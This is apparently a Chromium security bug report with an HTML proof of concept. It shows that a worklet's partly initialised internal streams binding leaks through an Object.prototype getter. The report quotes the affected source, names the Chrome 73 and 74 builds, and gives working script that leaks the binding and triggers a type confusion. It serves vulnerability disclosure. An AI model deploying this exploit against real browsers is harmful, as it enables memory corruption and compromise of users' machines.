1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138 | <!--
VULNERABILITY DETAILS
https://cs.chromium.org/chromium/src/third_party/blink/renderer/bindings/core/v8/initialize_v8_extras_binding.cc?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=90
void AddOriginals(ScriptState* script_state, v8::Local<v8::Object> binding) {
// These values are only used when serialization is enabled.
if (!RuntimeEnabledFeatures::TransferableStreamsEnabled())
return;
v8::Local<v8::Object> global = script_state->GetContext()->Global();
v8::Local<v8::Context> context = script_state->GetContext();
v8::Isolate* isolate = script_state->GetIsolate();
const auto ObjectGet = [&context, &isolate](v8::Local<v8::Value> object,
const char* property) {
DCHECK(object->IsObject());
return object.As<v8::Object>()
->Get(context, V8AtomicString(isolate, property))
.ToLocalChecked();
};
[...]
v8::Local<v8::Value> message_port = ObjectGet(global, "MessagePort");
v8::Local<v8::Value> dom_exception = ObjectGet(global, "DOMException");
// Most Worklets don't have MessagePort. In this case, serialization will
// fail. AudioWorklet has MessagePort but no DOMException, so it can't use
// serialization for now.
if (message_port->IsUndefined() || dom_exception->IsUndefined()) // ***1***
return;
v8::Local<v8::Value> event_target_prototype =
GetPrototype(ObjectGet(global, "EventTarget"));
Bind("EventTarget_addEventListener",
ObjectGet(event_target_prototype, "addEventListener"));
v8::Local<v8::Value> message_port_prototype = GetPrototype(message_port);
Bind("MessagePort_postMessage",
ObjectGet(message_port_prototype, "postMessage"));
[...]
https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=1044
function ReadableStreamSerialize(readable, port) {
// assert(IsReadableStream(readable),
// `! IsReadableStream(_readable_) is true`);
if (IsReadableStreamLocked(readable)) {
throw new TypeError(streamErrors.cannotTransferLockedStream);
}
if (!binding.MessagePort_postMessage) { // ***2***
throw new TypeError(streamErrors.cannotTransferContext);
}
const writable = CreateCrossRealmTransformWritable(port);
const promise =
ReadableStreamPipeTo(readable, writable, false, false, false);
markPromiseAsHandled(promise);
}
A worklet's context might not have the objects required to implement ReadableStream serialization.
In that case, |AddOriginals| would exit early leaving the |binding| object partially initialized[1].
|ReadableStreamSerialize| checks if the "MessagePort_postMessage" property exists on the |binding|
object to determine whether serialization is possible[2]. The problem is that the check would be
observable to a getter defined on |Object.prototype|, which could leak the value of |binding|.
VERSION
Google Chrome 73.0.3683.39 (Official Build) beta (64-bit) (cohort: Beta)
Chromium 74.0.3712.0 (Developer Build) (64-bit)
Also, please note that the "stream serialization" feature is currently hidden behind the
"experimental platform features" flag.
REPRODUCTION CASE
The repro case uses the leaked |binding| object to redefine an internal method and trigger a type
confusion.
-->
<body>
<h1>Click to start AudioContext</h1>
<script>
function runInWorket() {
function leakBinding(port) {
let stream = new ReadableStream;
let binding;
Object.prototype.__defineGetter__("MessagePort_postMessage", function() {
binding = this;
});
try {
port.postMessage(stream, [stream]);
} catch (e) {}
delete Object.prototype.MessagePort_postMessage;
return binding;
}
function triggerTypeConfusion(binding) {
console.log(Object.keys(binding));
binding.ReadableStreamTee = function() {
return 0x4142;
}
let stream = new ReadableStream;
stream.tee();
}
class MyWorkletProcessor extends AudioWorkletProcessor {
constructor() {
super();
triggerTypeConfusion(leakBinding(this.port));
}
process() {}
}
registerProcessor("my-worklet-processor", MyWorkletProcessor);
}
let blob = new Blob([`(${runInWorket}())`], {type: "text/javascript"});
let url = URL.createObjectURL(blob);
window.onclick = () => {
window.onclick = null;
class MyWorkletNode extends AudioWorkletNode {
constructor(context) {
super(context, "my-worklet-processor");
}
}
let context = new AudioContext();
context.audioWorklet.addModule(url).then(() => {
let node = new MyWorkletNode(context);
});
}
</script>
</body>
|